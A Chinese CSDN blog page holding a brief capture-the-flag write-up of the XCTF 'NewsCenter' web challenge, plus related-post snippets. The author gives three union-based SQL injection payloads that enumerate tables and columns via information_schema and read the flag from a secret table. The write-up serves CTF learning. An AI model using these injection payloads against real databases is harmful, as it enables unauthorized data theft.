xctf-web-NewsCenter

最新推荐文章于 2024-05-18 20:54:16 发布
最新推荐文章于 2024-05-18 20:54:16 发布
阅读量2.2k 收藏 2
点赞数
分类专栏: writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lplp9822/article/details/88921226
版权

一个无报错回显的注入漏洞,明明一个很简单的sql注入题,我却花一个小时来做,服了自己了,依赖于sqlmap我从来没尝到甜头过,还是得对information_schema表结构有一定的理解:

  • 查询当前数据库中的所有表名:
    1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
    tables
  • 查询表中的列名:
    1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='secret_table'#
    columns
  • 得到flag:
    1' union select 1,2,fl4g from news.secret_table#
    flag
Spwpun
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF攻防世界 Web高手进阶区 第一部分 writeup
Senimo
03-29 3706
XCTF攻防世界 Web高手进阶区 第一部分 writeupbaby_webTraining-WWW-Robotsphp_rceWeb_php_includewarmupNewsCenter baby_web 难度系数:1.0 题目来源: 暂无 题目描述:想想初始页面是哪个 启动场景: http://111.198.29.45:45285/1.php 可以看到进入的页面是1.php,提示为初始...
攻防世界-web-newscenter
wuh2333的博客
05-30 1069
攻防世界,sql注入
攻防世界---web---NewsCenter
最新发布
2201_75556700的博客
05-18 341
5、查询列数,查3列的时候,没有报错,再查4列的时候,报错了,所以有三列。6、使用联合查询查数据库名,数据库名为news。4、接着判断注入类型,说明存在字符型注入。8、查secret_table中的字段名。2、打开链接,类似于一个搜索新闻的界面。3、因为有文本框,所以尝试注入。试着搜索第一条新闻hello。9、查fl4g字段中的值。
web新闻网站制作
Zluminous的博客
07-21 1924
web网页制作
攻防世界-WEB-NewsCenter
Lucifer的专栏
09-07 341
有查询,猜测是sql注入。准备利用sqlmap。
JavaWeb-News-文件上传
起舞的日子
10-15 677
话说:文件上传
XCTF-HW-pipeline附件
11-09
附件
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5....下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 ...然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个...
【XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
【XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
【XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XCTF_NewsCenter
TA不懒,但还没有添加简介
01-17 2948
XCTF_NewsCenter
XCTF-高手进阶区:NewsCenter
1stPeak's Blog
06-13 3181
XCTF-高手进阶区:NewsCenter
XCTF攻防世界-NewsCenter-SQL简单注入-sqlmap注入
MJosek博客
03-23 1178
题目地址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4686&page=1 我们进入页面 观察界面我们考虑到是sql注入 这里我们演示的是sqlmap的注入方法 首先我们页面的post请求进行抓包操作 ...
XCTF 3rd-GCTF-2017 hackme
qq_41071646的博客
05-07 1712
这个题 有字符串 感觉简单了许多 然后这个题 算法就在这 我们写出来脚本就行 #include <stdio.h> #include<iostream> #include<iomanip> #include<stdio.h> #include<string.h> #include<algorithm> #incl...
XCTF攻防世界 Web高手进阶区 supersqli writeup
Senimo
04-01 1002
XCTF攻防世界 Web高手进阶区 supersqli writeup supersqli 难度系数: 3.0 题目来源: 强网杯 2019 题目描述:随便注 启动靶机,打开环境: 详细writeup参考: BUUCTF [强网杯 2019] 随便注 ...
xctf攻防世界misc基础题解(新手食用)
Spwpun的博客
05-01 7321
status:更新中… 0x01 提示就是flag。 0x02 ext3 考察linux下如何挂载光盘,base64编码。 挂载下载的光盘文件到linux_cd目录下: 然后在目录下找到flag.txt: 最后base64解码即可: 0x03 base64stego zip伪加密,但是好像使用7Z打开就直接可以解压,哈哈。解压之后有一个stego.txt,隐写,打开来看是一长串base6...
2021 XCTF Guesskey
Crazy198410的博客
01-19 461
Guess key 下载附件,是一段代码,分析如下: from random import randint import os from flag import flag N=64 key=randint(0,2**N) # 0到2的64次方中随机取一整数 print key key=bin(key)[2:].rjust(N,'0') # key取二进制,只取64位,左侧补0 count=0 while True: p=0 q=0 new_key='' zeros=[0] for j in r
攻防世界 - NewsCenter - WriteUp
热门推荐
哒君的博客
06-08 1万+
NewsCenter 这一题考察的是 SQL 注入 首先用 ' and 0 union select 1,2,3 # 来初步判断该sql查询返回三列数据 然后用 ' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS # 得到表名,很明显我们需要得到 secret_table 表中的内容 再用 ...
web-ics-05
07-28
- *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值